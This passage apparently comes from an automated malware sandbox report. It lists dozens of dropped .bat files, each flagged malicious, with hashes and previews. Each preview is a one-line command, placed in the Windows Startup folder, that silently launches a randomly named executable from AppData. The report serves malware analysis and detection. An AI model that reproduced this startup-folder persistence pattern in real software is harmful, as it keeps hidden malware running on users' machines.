                                                                                                                          Entropy (8bit):5.040156860408859
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5S2yTZsyeLAs:fE1923S2jyeLAs
                                                                                                                          MD5:E4B876164466B765BBA788A5EE730060
                                                                                                                          SHA1:5F2E3DEC346B5CBC6D1874508EBA1778906CFD09
                                                                                                                          SHA-256:A9DA72C2F0DF3CEB6760FC760D5806CFBA0AE08BB120CC6FF2901B95312B5302
                                                                                                                          SHA-512:501D62BCFCAABA26747CE599157B97244DB9748CA75E369610DDCCC7AE31A0895E78124CC6B1C8281A87CEC097E4BDC429295502949C69D5DCBFA9746D3FB0FE
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\7Kp576NDAvTzMJEKhm2Q0W0Q.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VFP6UagohjQssqJ93M7nVGAA.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.851309989710665
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5ifMSS2bust:fE1923i0S4st
                                                                                                                          MD5:81ECD3B635A408FF1972CCA425B87564
                                                                                                                          SHA1:04D72DF997D251D2754B86052C52CA0944F820C6
                                                                                                                          SHA-256:86BB4DF5267BB80EAD7D30CA8129A6E56CC228D55FF1EEC221A75DBC66235E12
                                                                                                                          SHA-512:67F1E87A4E7FA73D0F8960757FD7A92B6D9D44950F3422C58D4FD2C400F3D5637E8657A6AAD98B1C20F0D32BF821BE8CD614BEFB26A78AB39DCA39B94D183CDC
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\GzFms1Le87SMGeCC7Il4yqA4.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VnZF9b2NC7ruhyyJEaYXF7zf.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):5.085088960804955
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5C0fvUH1LNl:fE1923CAsVLv
                                                                                                                          MD5:2EB73E00653E0D1B8C16062094599485
                                                                                                                          SHA1:D1AC0322ED10CFE18545DDD9A015EF91503EE8AD
                                                                                                                          SHA-256:386093800A41B8AF2FF2AACD546130B81AE8061D274910EE3B3C0781E32549DE
                                                                                                                          SHA-512:1D0AAA9CAF3166EA80DEDDAAC5ECD7FF5ED52C53CF5E644EFB25FA84900CEB2A0E290BE7928D564AA8679ED8FE526DF8F56A9D1B6DB1E2B70D9407356ED547CC
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\gVtsjBmwbG1RqNOK7dMp2zOk.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WbZbZUFbJRp9V9DhX6D6SbsF.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.84536440293172
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5WQV+eENVkiFn:fE1923WQV+eIp
                                                                                                                          MD5:2B325414018A55E1CF55B135D07C100F
                                                                                                                          SHA1:934AEE58E05C6D677095C8D1334F5B528BA0B091
                                                                                                                          SHA-256:30B5FFA9862224653F680C5E1650364C5932E8BB32F81054F82A20B624DD3D1C
                                                                                                                          SHA-512:C9ADA517CEE01B235D400F225D29939CF2D14A115AFCEA7BDA584ACBD8679E19C8BEBD3869F51792DA6F0101AC2D0C4BD2CA958D5F85F79CE218367D8BE5513D
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\3uFEiJxNvXDLSx4uJaa7wat0.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wvf29ezu4o4eQUDaEcLfHh2i.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.810158782264433
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5Qnpq529z7:fE1923Qpq5217
                                                                                                                          MD5:6447BA778FE493B70B825111CD293E58
                                                                                                                          SHA1:6F7FE0C9473400DF8E7C055BDCD03521F2CAFA62
                                                                                                                          SHA-256:DADA9A282CE1881749960765EFF13D59532AE1B3AB0B1AB5392049B16463F98A
                                                                                                                          SHA-512:9E8E04BC0742B68B462460922E99A1055E3DD0553B8B4C247276A8FAA29C02D8AFF6D042EB6D1772D08034E0557F568AFA4DCB969C72B01362288D4919B99EC8
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\uBxBptf5NobXMRbp9XweSTtU.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X0SIO4n9RqqCJGm4W0OnxckQ.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):5.050940967582624
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5CBMx1IoKlNHF:fE1923C6x1I7F
                                                                                                                          MD5:C033CFEE43E546FA0C3C36FD76858121
                                                                                                                          SHA1:FCE0C334B9143C24CC3F1E21249E609C9C64D44E
                                                                                                                          SHA-256:B6B771C95A1A6A8A707118C979AC4E78215770B63A44FF397034DCFEBC7035F6
                                                                                                                          SHA-512:948EF9BB396438C5CF63484F4DF257B3446CDEBAB2C01BAB0A65AEB27F02852A4D959B7FA0FC4BA3B53842FF4E0EE3E03A76BF8F2C251AF69E0203EC10202E3D
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\g2LMCi9zXGxk0I4KoquGjNoW.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X3kzXxi5tUUbK9D3UM8FR6yB.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.904302931775618
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J518kPQXfWoQl:fE1923DPQP2
                                                                                                                          MD5:2BD362EDFC4FE70FB80422BF3310218B
                                                                                                                          SHA1:2AE58FCE39D7ED49C0CD3F704A5EDE098A13D8AE
                                                                                                                          SHA-256:49D1EE07232AA6385D0BF7295E87C27A178E55BD7C847592951D5528D265CA52
                                                                                                                          SHA-512:CDCBAF0958A448FE0D42D18780D2DFB8DB08A6AE19E6F86EF9AAA84DF27AD2F4F1630F8FB264A399D29793716BE27F2E85A5240F2AF92409DEEBFC8FD3771B59
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\PYAjuaDlqLKzTVmA3BsThyOt.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XwXewTdG4i3reg1W4KZwDkqE.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.927297795696143
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5CEyrQq1YJl:fE1923CEYIl
                                                                                                                          MD5:F59AE5898CBB1B66AC88535B7DA8EA38
                                                                                                                          SHA1:1FAD2410D7F793AC7965E3442404AFB0F88ADB3D
                                                                                                                          SHA-256:BF178ECD3002EE9864E5440CC9C1700453611FD58AE5004F3EF4169FD98CEC92
                                                                                                                          SHA-512:71E733B2EFCDF09A799BF18C324DE8EF4107F182AF44A3A08EBB5BD0B30CA6A1F40C3C9B9E50B99355EA8450CB90A929E049C9927DE9BD7454043B87ABF6A724
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\gatqNuidCSGWV0xrVKmzpZfK.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZVr8x8v8WWDz7nLkoJBAPLpU.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.829372753235094
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5Xq4NTQe:fE1923rNV
                                                                                                                          MD5:37651A535A2D58B62B8E4A0785A4B14F
                                                                                                                          SHA1:39FF0423A23ED8778B1042A90F3A07126539C0FF
                                                                                                                          SHA-256:1EF20BC7CA94049C9888FA0173DEF6D6E4EE8A5C6495E3EF99C043FAD146F944
                                                                                                                          SHA-512:887C7FD6260787B6246664A4247BD2E701126B5B73F0ABD38AFB52AE1058DAAD769E82F771A1CD25C10D2BE51D185E34951F157B976740DB34A03716C7AD6782
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\rMRbGvsAwIiAMKrvwkPegxs9.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Zo8clGYvUOyWdFarhfpUgMEN.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.936655253296908
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5XhdAOCF0s:fE1923xdno0s
                                                                                                                          MD5:C4ECBAB412B30155F6754391FCD21E4B
                                                                                                                          SHA1:A694DCD93E47D54F98E8A757DCA904DE8C3CA4DD
                                                                                                                          SHA-256:F56621B2A738401797BA08636629854B274C0CAA1FDAB3886F09149300F668B5
                                                                                                                          SHA-512:A19DBA154F2595FDE339C91072C55F70EED10D78781FB7FCBEF226E30D868B434418CAC792831DDF1E8FAB0F7F8C8CECB62B31A57D4190501D14F7F6F0D2B6A3
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\2h93Z8eIGDBBod8joPEiBXPj.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Zu88srVplDcE4JudkCIsfMfK.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):91
                                                                                                                          Entropy (8bit):4.9523902460631595
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5qO0ExIoToUsM2AHFIkdan:fE1923qO0sVTooSD
                                                                                                                          MD5:1EC00B15A2E696FB23BDDA5C5A18BDA7
                                                                                                                          SHA1:2FAA7A8B6835AF419F6C88051D67473005C234DF
                                                                                                                          SHA-256:89271D3F117ABE2DBD2894FD17187B5051AB0BDFF03E40ED1A6413A6A3C32128
                                                                                                                          SHA-512:233B82A599A0F17F7E3A44A79DED81A1507C278AB6E3073978392EE22521AB2829F9FAE30C489E0D5EA0B674C4558BA62859F44DF2EC3646983B2C17C8C2E486
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\OkQwRZm1uDGIMvmp1IlBrcDl.exe" --silent --allusers=0

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aG0yXFGDgm4eQ3ZK7Tgv4Q9D.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):91
                                                                                                                          Entropy (8bit):4.940724761801688
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5HdDehXP6AEykdan:fE19239DehfoyD
                                                                                                                          MD5:CD297C58620DB8813A34C653076A5A33
                                                                                                                          SHA1:35127C30C819D144EA153752FDC3B75E31C9E5C0
                                                                                                                          SHA-256:BF74B0189E44135D74A529912B8DD030164920F951ABB8E1C0494585D6F587AB
                                                                                                                          SHA-512:C6D6178F5636B9ED1A8EDDE2714D10E67910EDA2EB8B06F213ECC5007CC4B0569C9D4A3ECCA082CC1A6EB9ED0910BD1263BD77932EBDC7558D90E4BC592F65EA
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\byobdbFYFRrd9psjQQD2jS1U.exe" --silent --allusers=0

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aJ5ZzPIw4W4iDW4JiJvEgRVK.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.887942259950951
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J59TgERyN1CDKAs:fE1923xoCDKv
                                                                                                                          MD5:C3C54BB646A2591B4154B41F7BCC5CD4
                                                                                                                          SHA1:588066B400622CEFDE453DDE772FA0AC05098502
                                                                                                                          SHA-256:0B6C8CAE43280F9871F841056A03C680FE062F1E9510EF8C69A99FF65470E5C5
                                                                                                                          SHA-512:96AF7401CF92184F91CEE6A8B9E4B6AE7D75D13FDAF6218B793143C8E0BFD45E701EF04C84EDD6A2E96E19359C9D17CCACA00B835EE6910ADB0115132B319751
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\XvEaDZrVEGhrm4VFfP27fZuD.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aRQMhYcR0xLeNlVzNud4PjhM.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.916513688522379
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5drxXgRKS:fE1923pxw
                                                                                                                          MD5:14145F7F8FF072B6AA331B5FEFC67DA9
                                                                                                                          SHA1:D8432666ECF86C8B257CE3C49F1CA36EE4B792A0
                                                                                                                          SHA-256:5C1071BFA2FA441EDDD43A4C9ECCC6942FE6C18BEE314A5AFDD5B3A458060690
                                                                                                                          SHA-512:CAE9273CC71C606B636DF36D2556E9D72F72F2B791E7579ECB95284780B408D32AB6AF5B3408C63AF2B6E31D8AF28B65D52B5762395816C508D81D90751B7BE6
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\xNDUKCy2HYhrmC4BtkadguU1.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d78Ytvj4V0ta2ZiqFQElQpre.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):91
                                                                                                                          Entropy (8bit):5.071495470921359
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5WCpQl96RP+iykdan:fE1923WCpQl96RP+/D
                                                                                                                          MD5:6AFED331261D10B9311D5B506068B9A6
                                                                                                                          SHA1:94F7E84CF66BA629B68CEA10847340E00F52FF02
                                                                                                                          SHA-256:781F6B87F161BEEDD2406656D9F9E0ED91C67AFAA499E782696B521DF927B761
                                                                                                                          SHA-512:43B442D0346DEAA2CD87E0B64CC19E0CE3502C4B7D97C0C7E34EAED9D847320AB36C724FEB4A22757307FAB38292E81988B48846079C7F2CC0739CDC5034F325
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\sgtzC1bBRzEH97LXPXHm4FVd.exe" --silent --allusers=0

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dDOTNE5uA12l2ql1wlOLpcRF.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.920663603600285
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5L/8WymD0EFn:fE1923z8fXEF
                                                                                                                          MD5:ACEF1BA89299ED96EB657A436BA1F19F
                                                                                                                          SHA1:C0802E1BC098B8CFC7377ADCEB9080F5DDDEF3BD
                                                                                                                          SHA-256:FA40BF13701AA7C6ECA3E996180B237B90D5C237154280F5A426C18EF01D732F
                                                                                                                          SHA-512:A4D31BAC727DFFDDF5DB2771AC898B90A380BD2E7426E2C6634B68CCE1C85B5B4D316EEEEA0DC610BB12967998C529BF4524A2E81B1F6448966ECA3E5C6D711D
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\nUwn1YHZ6ZbqJMYsLSEECV7Y.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eJCDCqQnLPdN2iu0NZDfecsS.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.993798110439766
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5mUwAz418bvT0dm:fE1923mpYLTL
                                                                                                                          MD5:B1A198DD295E404C07AEF8C40D5A2026
                                                                                                                          SHA1:1630200F75670A16F39E02CA8663CBE3C207DD90
                                                                                                                          SHA-256:A41BD7F60E21D29FEBEBC9536178CB82904C6E7B0CF26C61D2EB65BADB873CD0
                                                                                                                          SHA-512:4E1277F7377CC855D0E8DE573AAEBDE383F9389229D3CA85290B3846B0AC1196D8964BCCCE470BB74A960D59989790101F14ED477921561EA54F11F944224D37
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\C83U8puVpwkXcWSHiHRNiMd6.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f8V9tkdL17zpTARbGXvubKh0.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):91
                                                                                                                          Entropy (8bit):4.944554602962091
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5QA2jdXLT+jClIkdan:fE1923QrjdbT+jpD
                                                                                                                          MD5:5396D7542BFEF0947A2904CAFE63BEA0
                                                                                                                          SHA1:EB59863F5FF5C62B05AD43BE093DC0A5FEA85565
                                                                                                                          SHA-256:88C0D466ECA5DA81938D9310DF87D4BBDFBADBF77939BEB5B2A5445686785330
                                                                                                                          SHA-512:44186C9198E9DFEB007F5535A224F3A6518D8B7D8429A07F0890B5A0153E0BD95292772184348475A9A9EA441B849114588CAAE9B10675EEBC00D084228CB81B
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\uu6kK0oC1Fx2nv3ruwv5SpiV.exe" --silent --allusers=0

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ftO6ibAWBETsFr4PHO0HWyVm.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.925871146123144
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J591hgYIxGmy/9t:fE1923XhpIAL
                                                                                                                          MD5:E221D4A352D5ED4CD72490846FFE738B
                                                                                                                          SHA1:17B0100B4722FB74D86072CD9C46409887CDCF8D
                                                                                                                          SHA-256:7EDADADBC3EF31FCCB66D0B1145C8EFD19059367C14D984266969555CEA69A77
                                                                                                                          SHA-512:F9F060C0BC0539F2BE7BE3B653928E80065CCBC9D7F4FEE8E1EDB33B3938B32A2A6D56FFF152322921557CEA3ECAAA85B1AE4FA2A18B4FD8E4E5601ECB9689DB
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\XPVSCvEdYfmDBcCxUZISEmv8.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gFEgarK2CmFukpJoHmXp7Y8A.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.607206767745191
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5LdGF9fAvL:fE1923xGHovL
                                                                                                                          MD5:256D1C36A9B1B89FA8AAC10B37F9AE22
                                                                                                                          SHA1:EF85FF258A94F5063DACDF6C55D9CFCAB1567F18
                                                                                                                          SHA-256:4A132612B00BAE15F1A4EB3DB461C1818F0B8FBF9877431FAFB991E9B6A913F7
                                                                                                                          SHA-512:F73CBD305B15EDC1AD8F888CC3099DCDAE3479F418D42065D7ABA78603F2AF675869572F45FC052458F01DADB514A8DDB091600A5C68DDB1CDD4969251E6E682
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\nUeK1cEoa1XzerepeCLGgwoc.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gcqaETM5DR0YwESEQzBRnZKK.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.972229896092239
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5wz/BLkls0EFn:fE1923wTyS0s
                                                                                                                          MD5:4AC9B0FF6CB9E5FBFFC5F200ABEE72AE
                                                                                                                          SHA1:8BF7659352F85FAD6509955548F26B12C112EC60
                                                                                                                          SHA-256:5F01CCF2AF9C3AC5C3E6D8C24264B491698E3FBAF08739B4BDA622967B815090
                                                                                                                          SHA-512:F6FDA9A067426A9846855EA5BE235970D880E0E11A7F85866D538501864BD05907DACEB861E92CF884F938AF2648121A8400770E4D340CF7741919D811AA64CC
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\UVZ0INMy369gioArueMwqIMb.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hDYTBIsUWgvU9DgjfmegeIG8.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.848586724205758
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5duDD3Mckvn:fE1923MD3MR
                                                                                                                          MD5:9597E570B6040A1C1DDC33E3ED98F108
                                                                                                                          SHA1:F9089487EA927356ABFF2759E5CBB5C8623CFB95
                                                                                                                          SHA-256:457891CD57D613672A020828B87CD55346D28F56C7D6EB31EC0D8D1577B7D3BC
                                                                                                                          SHA-512:B8CA789455AABA0D4961E21633EF4A17040BF449ECEF7D93723DD7F5B985BA5D3C3705A012AD2A3BCA880E24AC2165F487E2AA1B3A3D13B2CE5B100A1D5A9AFB
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\xKfiOAaKjAfRiycTLJ3RQV4l.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jPxMLAdrGIX6lhwANnPtfdmI.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.954442574694573
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5g4uEZuuEFn:fE1923g8QR
                                                                                                                          MD5:EAA18EE84EE3595F6BC24DDAC336E0EE
                                                                                                                          SHA1:B75C908ACC073C1DBE0CCD89357ACCDB097CD9BD
                                                                                                                          SHA-256:A0F9692300B0E1F58FD3CB7ADCA61216C180989B5BB1BD9AD62F88DE1E937A04
                                                                                                                          SHA-512:C8D6FC55ED2D5E58FA940C43B144A2549E82BF7B43AD929EEEE6AE3CEF2C02BABB2CE5DFCB040627F1AB21E2C0C1C3C518D6B6B7588932B326986069D362007D
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\E6QKqd9T2KlIZuLZuluVgjTV.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jaUbcEKacTPqo4Q1E5vfMGYC.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.824165210712234
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5XvAvGsuZ:fE1923FPZ
                                                                                                                          MD5:240EA494AA6009D66D706847CFBF9EBB
                                                                                                                          SHA1:CBE6690415CF69F70190E4437803ED7E87E2D585
                                                                                                                          SHA-256:28A05C6C536FDEE18655C95A42A14E2FA1415565A3AD233366CCA08D0A4F11E1
                                                                                                                          SHA-512:8A3C9E3128AFF0660A8A5AB7C3AA244540B4A3D860BD9713D57FFFB97D5912258F59C068E0AB3C91DFF4715D59665DFFB3E1151B999395B2B73F361C60C673C4
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\rekePksAYJc4iZuuuIdGaK6L.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jeY2PypT42qBGgOqmE9VOHfI.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.859370831379522
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5dVREnXVdXkAl:fE1923XREXHXkAl
                                                                                                                          MD5:E4B00913F26025F3DB9591CADB7BC1EB
                                                                                                                          SHA1:14E6AA7B1E82B4E959739888EF4B871DE04F840C
                                                                                                                          SHA-256:39970788C8F74EA0D1EE316167FFD50F72EFC35C3EFF473393536A7FC0F94AC7
                                                                                                                          SHA-512:69C58A3A520EE587861CBF14456105E3775B4389296352BF23FE64F3124BDEB938B641634FF5083541EC49B4B76A0E678756351EFFF8A95C3CD73C4E02B74420
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\8p4ak8QNfpnbvonzNVxC2iTG.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kJdsA9VA9hS9yUHHqg0ft5DV.bat

